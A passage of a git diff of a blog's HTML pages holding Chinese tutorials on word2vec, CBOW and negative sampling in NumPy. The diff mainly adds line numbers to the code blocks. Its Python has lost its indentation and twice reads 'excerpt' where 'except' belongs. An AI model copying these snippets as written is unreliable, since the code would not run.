            # truncated SVD (fast!)
            from sklearn.utils.extmath import randomized_svd
            U, S, V = randomized_svd(W, n_components=wordvec_size, n_iter=5, random_state=None)
            excerpt ImportError:
            # SVD (slow)
            U, S, V = np.linalg.svd(W)

            word_vecs = U[:, :wordvec_size]
            querys = ['you', 'year', 'car', 'toyota']
            for query in querys:
            most_similar(query, word_to_id, id_to_word, word_vecs, top=5)
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            import sys
            sys.path.append('..')
            import numpy as np
            from common.util import most_similar, create_co_matrix, ppmi
            from dataset import ptb

            window_size = 2
            wordvec_size = 100
            corpus, word_to_id, id_to_word = ptb.load_data('train')
            vocab_size = len(word_to_id)
            print('counting co-occurrence ...')
            C = create_co_matrix(corpus, vocab_size, window_size)
            print('calculating PPMI ...')
            W = ppmi(C, verbose=True)

            print('calculating SVD ...')
            try:
            # truncated SVD (fast!)
            from sklearn.utils.extmath import randomized_svd
            U, S, V = randomized_svd(W, n_components=wordvec_size, n_iter=5, random_state=None)
            excerpt ImportError:
            # SVD (slow)
            U, S, V = np.linalg.svd(W)

            word_vecs = U[:, :wordvec_size]
            querys = ['you', 'year', 'car', 'toyota']
            for query in querys:
            most_similar(query, word_to_id, id_to_word, word_vecs, top=5)
            counting co-occurrence ...
             calculating PPMI ...
             
            @@ -4671,6 +4669,8 @@ 

            目录

            var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-3-word2vec/index.html" "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-3-word2vec/index.html" index 6d0ab0d1e6..381d0edfee 100644 --- "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-3-word2vec/index.html" +++ "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-3-word2vec/index.html" @@ -44,8 +44,6 @@ - - @@ -423,7 +421,7 @@

            3.1.3 神经网络中的单词的处理方法

            我们将使用神经网络来处理单词。但是,神经网络无法直接处理 you 或 say 这样的单词,要用神经网络处理单词,需要先将单词转化为固定长度的向量。对此,一种方式是将单词转换为 one-hot 表示(one-hot 向量)。在 one-hot 表示中,只有一个元素是 1,其他元素都是 0。

            -
            import numpy as np

            c = np.array([[1, 0, 0, 0, 0, 0, 0]]) # 输入
            W = np.random.randn(7, 3) # 权重
            h = np.dot(c, W) # 中间节点
            print(h)
            +
            1
            2
            3
            4
            5
            6
            import numpy as np

            c = np.array([[1, 0, 0, 0, 0, 0, 0]]) # 输入
            W = np.random.randn(7, 3) # 权重
            h = np.dot(c, W) # 中间节点
            print(h)
            [[-0.7200455  -0.12248471 -0.19002763]]
             

            png

            @@ -434,7 +432,7 @@

            中间层的神经元是各个输入层经全连接层变换后得到的值的“平均”。

            经全连接层变换后,第 1 个输入层转化为 $h_1$,第 2 个输入层转化为 $h_2$,那么中间层的神经元是 $\frac{1}{2}(h_1+h_2)$。

            从输入层到中间层的变换由全连接层(权重是 $W_{in}$)完成。此时,全连接层的权重 $W_{in}$ 是一个 $7\times 3$ 的矩阵。提前剧透一下,这个权重就是我们要的单词的分布式表示。如此获得的向量很好地对单词含义进行了编码。这就是 word2vec 的全貌。

            -
            import sys
            sys.path.append('..')
            import numpy as np
            from common.layers import MatMul

            # 样本的上下文数据
            c0 = np.array([[1, 0, 0, 0, 0, 0, 0]])
            c1 = np.array([[0, 0, 1, 0, 0, 0, 0]])

            # 权重的初始值
            W_in = np.random.randn(7, 3)
            W_out = np.random.randn(3, 7)

            # 生成层
            in_layer0 = MatMul(W_in)
            in_layer1 = MatMul(W_in)
            out_layer = MatMul(W_out)

            # 正向传播
            h0 = in_layer0.forward(c0)
            h1 = in_layer1.forward(c1)
            h = 0.5 * (h0 + h1)
            s = out_layer.forward(h)

            print(s)
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            import sys
            sys.path.append('..')
            import numpy as np
            from common.layers import MatMul

            # 样本的上下文数据
            c0 = np.array([[1, 0, 0, 0, 0, 0, 0]])
            c1 = np.array([[0, 0, 1, 0, 0, 0, 0]])

            # 权重的初始值
            W_in = np.random.randn(7, 3)
            W_out = np.random.randn(3, 7)

            # 生成层
            in_layer0 = MatMul(W_in)
            in_layer1 = MatMul(W_in)
            out_layer = MatMul(W_out)

            # 正向传播
            h0 = in_layer0.forward(c0)
            h1 = in_layer1.forward(c1)
            h = 0.5 * (h0 + h1)
            s = out_layer.forward(h)

            print(s)
            [[-1.6202109   0.75824908 -0.05364709 -0.39814822 -0.37373042  0.51207421
                0.8510953 ]]
             
            @@ -455,13 +453,13 @@

            word2vec 中使用的神经网络的输入是上下文,它的正确解标签是被这些上下文包围在中间的单词,即目标词。

            将语料库中的目标单词作为目标词,将其周围的单词作为上下文提取出来。我们对语料库中的所有单词都执行该操作(两端的单词除外),可以得到 contexts(上下文)和 target(目标词)。

            将语料库的文本转换成单词 ID

            -
            import sys
            sys.path.append('..')
            from common.util import preprocess

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            print(corpus)
            print(id_to_word)
            +
            1
            2
            3
            4
            5
            6
            7
            8
            import sys
            sys.path.append('..')
            from common.util import preprocess

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            print(corpus)
            print(id_to_word)
            [0 1 2 3 4 1 5 6]
             {0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}
             

            实现生成上下文和目标词的函数

            -
            def create_contexts_target(corpus, window_size=1):
            """
            corpus: 单词 ID 列表
            window_size: 上下文的窗口大小
            return: NumPy 多维数组格式的上下文和目标词
            """
            # 就目标词而言,target[0] 保存的是第 0 个目标词,target[1] 保存的是第 1 个目标词。
            target = corpus[window_size:-window_size]
            """
            contexts 是二维数组。此时,contexts 的第 0 维保存的是各个上下文数据。
            具体来说,contexts[0] 保存的是第 0 个上下文,context[1] 保存的是第 1 个上下文。
            """
            contexts = []

            for idx in range(window_size, len(corpus)-window_size):
            cs = []
            for t in range(-window_size, window_size + 1):
            if t == 0:
            continue
            cs.append(corpus[idx + t])
            contexts.append(cs)
            return np.array(contexts), np.array(target)
            -
            contexts, target = create_contexts_target(corpus, window_size=1)

            print(contexts)
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            def create_contexts_target(corpus, window_size=1):
            """
            corpus: 单词 ID 列表
            window_size: 上下文的窗口大小
            return: NumPy 多维数组格式的上下文和目标词
            """
            # 就目标词而言,target[0] 保存的是第 0 个目标词,target[1] 保存的是第 1 个目标词。
            target = corpus[window_size:-window_size]
            """
            contexts 是二维数组。此时,contexts 的第 0 维保存的是各个上下文数据。
            具体来说,contexts[0] 保存的是第 0 个上下文,context[1] 保存的是第 1 个上下文。
            """
            contexts = []

            for idx in range(window_size, len(corpus)-window_size):
            cs = []
            for t in range(-window_size, window_size + 1):
            if t == 0:
            continue
            cs.append(corpus[idx + t])
            contexts.append(cs)
            return np.array(contexts), np.array(target)
            +
            1
            2
            3
            contexts, target = create_contexts_target(corpus, window_size=1)

            print(contexts)
            [[0 2]
              [1 3]
              [2 4]
            @@ -473,16 +471,16 @@ 

            3.3.2 转换为 one-hot 表示

            png

            -
            import sys
            sys.path.append('..')
            from common.util import preprocess, create_contexts_target, convert_one_hot

            text = 'You say goodbye and I say hello.'

            corpus, word_to_id, id_to_word = preprocess(text)

            contexts, target = create_contexts_target(corpus, window_size=1)

            vocab_size = len(word_to_id)
            target = convert_one_hot(target, vocab_size)
            contexts = convert_one_hot(contexts, vocab_size)
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            import sys
            sys.path.append('..')
            from common.util import preprocess, create_contexts_target, convert_one_hot

            text = 'You say goodbye and I say hello.'

            corpus, word_to_id, id_to_word = preprocess(text)

            contexts, target = create_contexts_target(corpus, window_size=1)

            vocab_size = len(word_to_id)
            target = convert_one_hot(target, vocab_size)
            contexts = convert_one_hot(contexts, vocab_size)

            3.4 CBOW 模型的实现

            png

            -
            import sys
            sys.path.append('..')
            import numpy as np
            from common.layers import MatMul, SoftmaxWithLoss

            class SimpleCBOW:
            def __init__(self, vocab_size, hidden_size):
            """
            vocab_size: 词汇个数
            hidden_size: 中间层的神经元个数
            """
            V, H = vocab_size, hidden_size

            # 初始化权重
            W_in = 0.01 * np.random.randn(V, H).astype('f') # 初始化将使用 32 位的浮点数
            W_out = 0.01 * np.random.randn(H, V).astype('f')

            # 生成层
            self.in_layer0 = MatMul(W_in)
            self.in_layer1 = MatMul(W_in)
            self.out_layer = MatMul(W_out)
            self.loss_layer = SoftmaxWithLoss()

            # 将所有的权重和梯度整理到列表中
            layers = [self.in_layer0, self.in_layer1, self.out_layer]
            self.params, self.grads = [], []
            for layer in layers:
            self.params += layer.params
            self.grads += layer.grads

            # 将单词的分布式表示设置为成员变量
            self.word_vecs = W_in


            def forward(self, contexts, target):
            """
            神经网络的正向传播 forward() 函数。
            这个函数接收参数 contexts 和 target,并返回损失(loss)。
            """
            h0 = self.in_layer0.forward(contexts[:, 0])
            h1 = self.in_layer1.forward(contexts[:, 1])
            h = (h0 + h1) * 0.5
            score = self.out_layer.forward(h)
            loss = self.loss_layer.forward(score, target)
            return loss


            def backward(self, dout=1):
            """
            反向传播
            """
            ds = self.loss_layer.backward(dout)
            da = self.out_layer.backward(ds)
            da *= 0.5
            self.in_layer1.backward(da)
            self.in_layer0.backward(da)
            return None
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            29
            30
            31
            32
            33
            34
            35
            36
            37
            38
            39
            40
            41
            42
            43
            44
            45
            46
            47
            48
            49
            50
            51
            52
            53
            54
            55
            56
            57
            import sys
            sys.path.append('..')
            import numpy as np
            from common.layers import MatMul, SoftmaxWithLoss

            class SimpleCBOW:
            def __init__(self, vocab_size, hidden_size):
            """
            vocab_size: 词汇个数
            hidden_size: 中间层的神经元个数
            """
            V, H = vocab_size, hidden_size

            # 初始化权重
            W_in = 0.01 * np.random.randn(V, H).astype('f') # 初始化将使用 32 位的浮点数
            W_out = 0.01 * np.random.randn(H, V).astype('f')

            # 生成层
            self.in_layer0 = MatMul(W_in)
            self.in_layer1 = MatMul(W_in)
            self.out_layer = MatMul(W_out)
            self.loss_layer = SoftmaxWithLoss()

            # 将所有的权重和梯度整理到列表中
            layers = [self.in_layer0, self.in_layer1, self.out_layer]
            self.params, self.grads = [], []
            for layer in layers:
            self.params += layer.params
            self.grads += layer.grads

            # 将单词的分布式表示设置为成员变量
            self.word_vecs = W_in


            def forward(self, contexts, target):
            """
            神经网络的正向传播 forward() 函数。
            这个函数接收参数 contexts 和 target,并返回损失(loss)。
            """
            h0 = self.in_layer0.forward(contexts[:, 0])
            h1 = self.in_layer1.forward(contexts[:, 1])
            h = (h0 + h1) * 0.5
            score = self.out_layer.forward(h)
            loss = self.loss_layer.forward(score, target)
            return loss


            def backward(self, dout=1):
            """
            反向传播
            """
            ds = self.loss_layer.backward(dout)
            da = self.out_layer.backward(ds)
            da *= 0.5
            self.in_layer1.backward(da)
            self.in_layer0.backward(da)
            return None

            学习的实现

            CBOW 模型的学习和一般的神经网络的学习完全相同。首先,给神经网络准备好学习数据。然后,求梯度,并逐步更新权重参数。

            -
            import sys
            sys.path.append('..')
            from common.trainer import Trainer
            from common.optimizer import Adam
            from common.util import preprocess, create_contexts_target, convert_one_hot

            window_size = 1
            hidden_size = 5
            batch_size = 3
            max_epoch = 1000

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)

            vocab_size = len(word_to_id)
            contexts, target = create_contexts_target(corpus, window_size)
            target = convert_one_hot(target, vocab_size)
            contexts = convert_one_hot(contexts, vocab_size)

            model = SimpleCBOW(vocab_size, hidden_size)
            optimizer = Adam()
            trainer = Trainer(model, optimizer)
            trainer.fit(contexts, target, max_epoch, batch_size)
            trainer.plot()
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            import sys
            sys.path.append('..')
            from common.trainer import Trainer
            from common.optimizer import Adam
            from common.util import preprocess, create_contexts_target, convert_one_hot

            window_size = 1
            hidden_size = 5
            batch_size = 3
            max_epoch = 1000

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)

            vocab_size = len(word_to_id)
            contexts, target = create_contexts_target(corpus, window_size)
            target = convert_one_hot(target, vocab_size)
            contexts = convert_one_hot(contexts, vocab_size)

            model = SimpleCBOW(vocab_size, hidden_size)
            optimizer = Adam()
            trainer = Trainer(model, optimizer)
            trainer.fit(contexts, target, max_epoch, batch_size)
            trainer.plot()

            png

            查看学习后的权重参数

            -
            word_vecs = model.word_vecs
            for word_id, word in id_to_word.items():
            print(word, word_vecs[word_id])
            +
            1
            2
            3
            word_vecs = model.word_vecs
            for word_id, word in id_to_word.items():
            print(word, word_vecs[word_id])
            you [-0.9274265  -0.91214865 -0.9109259   0.8992449  -1.6783223 ]
             say [ 1.1131934  1.0601219  1.1271317 -1.1453978 -1.2170266]
             goodbye [-0.9434733  -0.9451493  -1.0034578   1.0183493   0.01961206]
            @@ -4460,6 +4458,8 @@ 

            目录

            var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-4-word2vec\351\253\230\351\200\237\345\214\226/index.html" "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-4-word2vec\351\253\230\351\200\237\345\214\226/index.html" index a3e9071953..6d7a11078c 100644 --- "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-4-word2vec\351\253\230\351\200\237\345\214\226/index.html" +++ "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\350\277\233\351\230\266-\350\207\252\347\204\266\350\257\255\350\250\200\345\244\204\347\220\206-4-word2vec\351\253\230\351\200\237\345\214\226/index.html" @@ -44,8 +44,6 @@ - - @@ -441,7 +439,7 @@

            4.1.1

            4.1.2 Embedding 层的实现

            从矩阵中取出某一行的处理是很容易实现的。这里,假设权重 W 是 NumPy 的二维数组。如果要从这个权重中取出某个特定的行,只需写 W[2]
            或者 W[5]

            -
            import numpy as np
            W = np.arange(21).reshape(7, 3)
            W
            +
            1
            2
            3
            import numpy as np
            W = np.arange(21).reshape(7, 3)
            W
            array([[ 0,  1,  2],
                    [ 3,  4,  5],
                    [ 6,  7,  8],
            @@ -450,7 +448,7 @@ 

            W[2]
            +
            1
            W[2]
            array([[ 6,  7,  8],
                    [ 9, 10, 11],
                    [12, 13, 14],
            @@ -458,14 +456,14 @@ 

            idx = np.array([1, 0, 3, 0])
            W[idx]
            +
            1
            2
            idx = np.array([1, 0, 3, 0])
            W[idx]
            array([[ 3,  4,  5],
                    [ 0,  1,  2],
                    [ 9, 10, 11],
                    [ 0,  1,  2]])
             

            实现 Embedding 层的 forward()backward()方法:

            -
            class Embedding:
            def __init__(self, W):
            """
            使用 params 和 grads 作为成员变量
            """
            self.params = [W]
            self.grads = [np.zeros_like(W)]
            self.idx = None


            def forward(self, idx):
            """
            在成员变量 idx 中以数组的形式保存需要提取的行的索引(单词 ID)
            在反向传播时,从上一层(输出侧的层)传过来的梯度将原样传给下一层(输入侧的层)。
            不过,从上一层传来的梯度会被应用到权重梯度 dW 的特定行(idx)
            """
            W, = self.params
            self.idx = idx
            out = W[idx]
            return out


            def backward(self, dout):
            dW, = self.grads
            dW[...] = 0

            """
            dW[self.idx] = dout 是不太好的方式,存在一个问题,
            这一问题发生在 idx 的元素出现重复时,其中某个值就会被覆盖掉。
            """
            for i, word_id in enumerate(self.idx):
            dW[word_id] += dout[i]
            # 或者
            # np.add.at(dW, self.idx, dout)
            return None
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            29
            30
            31
            32
            33
            34
            35
            class Embedding:
            def __init__(self, W):
            """
            使用 params 和 grads 作为成员变量
            """
            self.params = [W]
            self.grads = [np.zeros_like(W)]
            self.idx = None


            def forward(self, idx):
            """
            在成员变量 idx 中以数组的形式保存需要提取的行的索引(单词 ID)
            在反向传播时,从上一层(输出侧的层)传过来的梯度将原样传给下一层(输入侧的层)。
            不过,从上一层传来的梯度会被应用到权重梯度 dW 的特定行(idx)
            """
            W, = self.params
            self.idx = idx
            out = W[idx]
            return out


            def backward(self, dout):
            dW, = self.grads
            dW[...] = 0

            """
            dW[self.idx] = dout 是不太好的方式,存在一个问题,
            这一问题发生在 idx 的元素出现重复时,其中某个值就会被覆盖掉。
            """
            for i, word_id in enumerate(self.idx):
            dW[word_id] += dout[i]
            # 或者
            # np.add.at(dW, self.idx, dout)
            return None

            4.2 word2vec 的改进 2

            采用名为**负采样(negative sampling)**的方法作为解决方案。使用 Negative Sampling 替代 Softmax,无论词汇量有多大,都可以使计算量保持较低或恒定。

            4.2.1 中间层之后的计算问题

            @@ -499,7 +497,7 @@

            4.2.4 多分类到二分类的实现

            引入 Embedding Dot 层,该层将 Embedding 层和 dot 运算(内积)合并起来处理。

            -
            class EmbeddingDot:
            def __init__(self, W):
            """
            params: 保存参数
            grads: 保存梯度
            embed: 保存 Embedding 层作为缓存
            cache: 保存正向传播时的计算结果
            """
            self.embed = Embedding(W)
            self.params = self.embed.params
            self.grads = self.embed.grads
            self.cache = None


            def forward(self, h, idx):
            target_W = self.embed.forward(idx)
            out = np.sum(target_W * h, axis=1)
            self.cache = (h, target_W)
            return out


            def backward(self, dout):
            h, target_W = self.cache
            dout = dout.reshape(dout.shape[0], 1)
            dtarget_W = dout * h
            self.embed.backward(dtarget_W)
            dh = dout * target_W
            return dh
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            class EmbeddingDot:
            def __init__(self, W):
            """
            params: 保存参数
            grads: 保存梯度
            embed: 保存 Embedding 层作为缓存
            cache: 保存正向传播时的计算结果
            """
            self.embed = Embedding(W)
            self.params = self.embed.params
            self.grads = self.embed.grads
            self.cache = None


            def forward(self, h, idx):
            target_W = self.embed.forward(idx)
            out = np.sum(target_W * h, axis=1)
            self.cache = (h, target_W)
            return out


            def backward(self, dout):
            h, target_W = self.cache
            dout = dout.reshape(dout.shape[0], 1)
            dtarget_W = dout * h
            self.embed.backward(dtarget_W)
            dh = dout * target_W
            return dh

            4.2.5 负采样

            png

            我们目前仅学习了正例(正确答案),还不确定负例(错误答案)会有怎样的结果。

            @@ -511,40 +509,40 @@

            4.

            4.2.6 负采样的采样方法

            基于语料库中各个单词的出现次数求出概率分布后,只需根据这个概率分布进行采样就可以了。通过根据概率分布进行采样,语料库中经常出现的单词将容易被抽到,而“稀有单词”将难以被抽到。

            使用 Python 来说明基于概率分布的采样:

            -
            # 从 0 到 9 的数字中随机选择一个数字
            np.random.choice(10)
            +
            1
            2
            # 从 0 到 9 的数字中随机选择一个数字
            np.random.choice(10)
            4
             
            -
            # 从 words 列表中随机选择一个元素
            words = ['you', 'say', 'goodbye', 'I', 'hello', '.']
            np.random.choice(words)
            +
            1
            2
            3
            # 从 words 列表中随机选择一个元素
            words = ['you', 'say', 'goodbye', 'I', 'hello', '.']
            np.random.choice(words)
            'goodbye'
             
            -
            # 有放回采样 5 次
            np.random.choice(words, size=5)
            +
            1
            2
            # 有放回采样 5 次
            np.random.choice(words, size=5)
            array(['you', '.', 'say', 'hello', 'say'], dtype='<U7')
             
            -
            # 无放回采样 5 次
            np.random.choice(words, size=5, replace=False)
            +
            1
            2
            # 无放回采样 5 次
            np.random.choice(words, size=5, replace=False)
            array(['goodbye', 'I', 'say', 'you', 'hello'], dtype='<U7')
             
            -
            # 基于概率分布进行采样
            p = [0.5, 0.1, 0.05, 0.2, 0.05, 0.1]
            np.random.choice(words, p=p)
            +
            1
            2
            3
            # 基于概率分布进行采样
            p = [0.5, 0.1, 0.05, 0.2, 0.05, 0.1]
            np.random.choice(words, p=p)
            'I'
             

            word2vec 中提出的负采样对刚才的概率分布增加了一个步骤。如下式所示,对原来的概率分布取 0.75 次方。

            $$P’(w_i)=\frac{P(w_i){0.75}}{\sumn_jP(w_j)^{0.75}}$$

            为了防止低频单词被忽略。更准确地说,通过取 0.75 次方,低频单词的概率将稍微变高。

            -
            p = [0.7, 0.29, 0.01]
            new_p = np.power(p, 0.75)
            new_p /= np.sum(new_p)
            print(new_p)
            +
            1
            2
            3
            4
            p = [0.7, 0.29, 0.01]
            new_p = np.power(p, 0.75)
            new_p /= np.sum(new_p)
            print(new_p)
            [0.64196878 0.33150408 0.02652714]
             

            根据这个例子,变换前概率为 0.01(1%)的元素,变换后为 0.026…(2.6…%)。通过这种方式,取 0.75 次方作为一种补救措施,使得低频单词稍微更容易被抽到。

            此外,0.75 这个值并没有什么理论依据,也可以设置成 0.75 以外的值。

            -
            corpus = np.array([0, 1, 2, 3, 4, 1, 2, 3])
            power = 0.75
            sample_size = 2
            # 该方法以参数 target 指定的单词 ID 为正例,对其他的单词 ID 进行采样。
            sampler = UnigramSampler(corpus, power, sample_size)
            target = np.array([1, 3, 0])
            negative_sample = sampler.get_negative_sample(target)
            print(negative_sample)
            +
            1
            2
            3
            4
            5
            6
            7
            8
            corpus = np.array([0, 1, 2, 3, 4, 1, 2, 3])
            power = 0.75
            sample_size = 2
            # 该方法以参数 target 指定的单词 ID 为正例,对其他的单词 ID 进行采样。
            sampler = UnigramSampler(corpus, power, sample_size)
            target = np.array([1, 3, 0])
            negative_sample = sampler.get_negative_sample(target)
            print(negative_sample)

            4.2.7 负采样的实现

            -
            class NegativeSamplingLoss:
            def __init__(self, W, corpus, power=0.75, sample_size=5):
            self.sample_size = sample_size
            self.sampler = UnigramSampler(corpus, power, sample_size)
            self.loss_layers = [SigmoidWithLoss() for _ in range(sample_size + 1)]
            self.embed_dot_layers = [EmbeddingDot(W) for _ in range(sample_size + 1)]
            self.params, self.grads = [], []
            for layer in self.embed_dot_layers:
            self.params += layer.params
            self.grads += layer.grads


            def forward(self, h, target):
            """
            h: 中间层的神经元
            target: 正例目标
            """
            batch_size = target.shape[0]
            # 使用 self.sampler 采样负例,并设为 negative_sample
            negative_sample = self.sampler.get_negative_sample(target)

            # 正例的正向传播
            score = self.embed_dot_layers[0].forward(h, target)
            correct_label = np.ones(batch_size, dtype=np.int32) # 正例的正确解标签为 1
            loss = self.loss_layers[0].forward(score, correct_label)

            # 负例的正向传播
            negative_label = np.zeros(batch_size, dtype=np.int32) # 负例的正确解标签为 0
            for i in range(self.sample_size):
            negative_target = negative_sample[:, i]
            score = self.embed_dot_layers[1 + i].forward(h, negative_target)
            loss += self.loss_layers[1 + i].forward(score, negative_label)

            return loss


            def backward(self, dout=1):
            dh = 0
            for l0, l1 in zip(self.loss_layers, self.embed_dot_layers):
            """
            与正向传播相反的顺序调用各层的 backward() 函数即可
            """
            dscore = l0.backward(dout)
            dh += l1.backward(dscore)
            return dh
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            29
            30
            31
            32
            33
            34
            35
            36
            37
            38
            39
            40
            41
            42
            43
            44
            45
            class NegativeSamplingLoss:
            def __init__(self, W, corpus, power=0.75, sample_size=5):
            self.sample_size = sample_size
            self.sampler = UnigramSampler(corpus, power, sample_size)
            self.loss_layers = [SigmoidWithLoss() for _ in range(sample_size + 1)]
            self.embed_dot_layers = [EmbeddingDot(W) for _ in range(sample_size + 1)]
            self.params, self.grads = [], []
            for layer in self.embed_dot_layers:
            self.params += layer.params
            self.grads += layer.grads


            def forward(self, h, target):
            """
            h: 中间层的神经元
            target: 正例目标
            """
            batch_size = target.shape[0]
            # 使用 self.sampler 采样负例,并设为 negative_sample
            negative_sample = self.sampler.get_negative_sample(target)

            # 正例的正向传播
            score = self.embed_dot_layers[0].forward(h, target)
            correct_label = np.ones(batch_size, dtype=np.int32) # 正例的正确解标签为 1
            loss = self.loss_layers[0].forward(score, correct_label)

            # 负例的正向传播
            negative_label = np.zeros(batch_size, dtype=np.int32) # 负例的正确解标签为 0
            for i in range(self.sample_size):
            negative_target = negative_sample[:, i]
            score = self.embed_dot_layers[1 + i].forward(h, negative_target)
            loss += self.loss_layers[1 + i].forward(score, negative_label)

            return loss


            def backward(self, dout=1):
            dh = 0
            for l0, l1 in zip(self.loss_layers, self.embed_dot_layers):
            """
            与正向传播相反的顺序调用各层的 backward() 函数即可
            """
            dscore = l0.backward(dout)
            dh += l1.backward(dscore)
            return dh

            4.3 改进版 word2vec 的学习

            4.3.1 CBOW 模型的实现

            png

            -
            import sys
            sys.path.append('..')
            from common.np import * # import numpy as np
            from common.layers import Embedding
            from ch04.negative_sampling_layer import NegativeSamplingLoss


            class CBOW:
            def __init__(self, vocab_size, hidden_size, window_size, corpus):
            V, H = vocab_size, hidden_size

            # 初始化权重
            W_in = 0.01 * np.random.randn(V, H).astype('f')
            W_out = 0.01 * np.random.randn(V, H).astype('f')

            # 生成层
            self.in_layers = []
            for i in range(2 * window_size):
            layer = Embedding(W_in) # 使用 Embedding 层
            self.in_layers.append(layer)
            self.ns_loss = NegativeSamplingLoss(W_out, corpus, power=0.75, sample_size=5)

            # 将所有的权重和梯度整理到列表中
            layers = self.in_layers + [self.ns_loss]
            self.params, self.grads = [], []
            for layer in layers:
            self.params += layer.params
            self.grads += layer.grads

            # 将单词的分布式表示设置为成员变量
            self.word_vecs = W_in


            def forward(self, contexts, target):
            h = 0
            for i, layer in enumerate(self.in_layers):
            h += layer.forward(contexts[:, i])
            h *= 1 / len(self.in_layers)
            loss = self.ns_loss.forward(h, target)
            return loss


            def backward(self, dout=1):
            dout = self.ns_loss.backward(dout)
            dout *= 1 / len(self.in_layers)
            for layer in self.in_layers:
            layer.backward(dout)
            return None

            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            17
            18
            19
            20
            21
            22
            23
            24
            25
            26
            27
            28
            29
            30
            31
            32
            33
            34
            35
            36
            37
            38
            39
            40
            41
            42
            43
            44
            45
            46
            47
            48
            49
            import sys
            sys.path.append('..')
            from common.np import * # import numpy as np
            from common.layers import Embedding
            from ch04.negative_sampling_layer import NegativeSamplingLoss


            class CBOW:
            def __init__(self, vocab_size, hidden_size, window_size, corpus):
            V, H = vocab_size, hidden_size

            # 初始化权重
            W_in = 0.01 * np.random.randn(V, H).astype('f')
            W_out = 0.01 * np.random.randn(V, H).astype('f')

            # 生成层
            self.in_layers = []
            for i in range(2 * window_size):
            layer = Embedding(W_in) # 使用 Embedding 层
            self.in_layers.append(layer)
            self.ns_loss = NegativeSamplingLoss(W_out, corpus, power=0.75, sample_size=5)

            # 将所有的权重和梯度整理到列表中
            layers = self.in_layers + [self.ns_loss]
            self.params, self.grads = [], []
            for layer in layers:
            self.params += layer.params
            self.grads += layer.grads

            # 将单词的分布式表示设置为成员变量
            self.word_vecs = W_in


            def forward(self, contexts, target):
            h = 0
            for i, layer in enumerate(self.in_layers):
            h += layer.forward(contexts[:, i])
            h *= 1 / len(self.in_layers)
            loss = self.ns_loss.forward(h, target)
            return loss


            def backward(self, dout=1):
            dout = self.ns_loss.backward(dout)
            dout *= 1 / len(self.in_layers)
            for layer in self.in_layers:
            layer.backward(dout)
            return None

            4.3.2 CBOW 模型的学习代码

            -
            import sys
            sys.path.append('..')
            import numpy as np
            from common import config
            # 在用 GPU 运行时,请打开下面的注释(需要 cupy)
            # ===============================================
            config.GPU = True
            # ===============================================
            import pickle
            from common.trainer import Trainer
            from common.optimizer import Adam
            from common.util import create_contexts_target, to_cpu, to_gpu
            from dataset import ptb

            # 设定超参数
            window_size = 5
            hidden_size = 100
            batch_size = 100
            max_epoch = 10

            # 读入数据
            corpus, word_to_id, id_to_word = ptb.load_data('train')
            vocab_size = len(word_to_id)

            contexts, target = create_contexts_target(corpus, window_size)
            if config.GPU:
            contexts, target = to_gpu(contexts), to_gpu(target)

            # 生成模型等
            model = CBOW(vocab_size, hidden_size, window_size, corpus)
            optimizer = Adam()
            trainer = Trainer(model, optimizer)

            # 开始学习
            trainer.fit(contexts, target, max_epoch, batch_size)
            trainer.plot()

            # 保存必要数据,以便后续使用
            word_vecs = model.word_vecs
            if config.GPU:
            word_vecs = to_cpu(word_vecs)
            params = {}
            params['word_vecs'] = word_vecs.astype(np.float16)
            params['word_to_id'] = word_to_id
            params['id_to_word'] = id_to_word
            pkl_file = 'cbow_params.pkl'
            with open(pkl_file, 'wb') as f:
            pickle.dump(params, f, -1)
            +
            1
